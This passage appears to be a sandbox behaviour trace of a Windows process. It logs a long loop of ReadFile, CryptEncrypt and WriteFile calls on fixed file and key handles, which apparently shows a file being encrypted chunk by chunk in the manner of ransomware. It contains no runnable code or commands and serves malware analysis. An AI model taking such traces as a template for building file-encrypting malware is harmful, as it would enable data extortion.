lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.759] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.759] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.759] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.759] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.760] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.760] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.760] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.760] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.760] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.760] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.761] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.761] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.761] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.761] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.761] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.761] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.762] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.762] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.762] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.762] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.762] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.762] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.763] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.763] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.763] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.763] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.763] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.763] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.764] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.764] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.764] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.764] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.764] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.765] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.765] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.765] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.765] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.765] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.766] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.766] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.766] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.766] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.766] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, 